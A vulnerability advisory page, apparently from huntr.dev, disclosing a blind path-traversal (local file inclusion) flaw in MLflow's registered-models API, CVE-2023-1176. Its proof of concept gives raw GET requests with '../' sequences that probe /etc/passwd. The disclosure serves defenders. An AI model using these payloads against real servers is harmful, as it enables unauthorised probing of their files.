Lucene search
DanmcinerneyAE92F814-6A08-435C-8445-EEC0EF4F1085HistoryMar 03, 2023 - 10:14 p.m.
Blind LFI in register-model/get?name=
2023-03-0322:14:07
danmcinerney
www.huntr.dev
23
blind lfi
500 internal server error
404 not found
ajax-api
mlflow
EPSS
0
Percentile
9.0%
Description
A blind LFI exists in /ajax-api/2.0/mlflow/registered-models/get?name=
The response from the server is different depending on if the file exists on the local file system or not. When the arbitrary local file exists, the server responds with 500 INTERNAL SERVER ERROR and when it doesn’t exist it returns a 404 NOT FOUND response.
Proof of Concept
GET /ajax-api/2.0/mlflow/registered-models/get?name=../../../../../../../../../etc/passwd HTTP/1.1
Returns 500 INTERNAL SERVER ERROR because /etc/passwd exists in the server.
GET /ajax-api/2.0/mlflow/registered-models/get?name=../../../../../../../../../etc/doesNotExist
Returns 404 NOT FOUND because /etc/doesNotExist isn’t a file on the local filesystem.
Related
osv
osv
CVE-2023-1176
2023-03-24 15:15:10
BIT-mlflow-2023-1176
2024-03-06 10:59:27
prion
prion
Path traversal
2023-03-24 15:15:00
veracode
veracode
Path Traversal
2023-03-29 08:07:17
cvelist
cvelist
CVE-2023-1176 Absolute Path Traversal in mlflow/mlflow
2023-03-24 00:00:00
github
github
nvd
nvd
CVE-2023-1176
2023-03-24 15:15:10
cve
cve
CVE-2023-1176
2023-03-24 15:15:10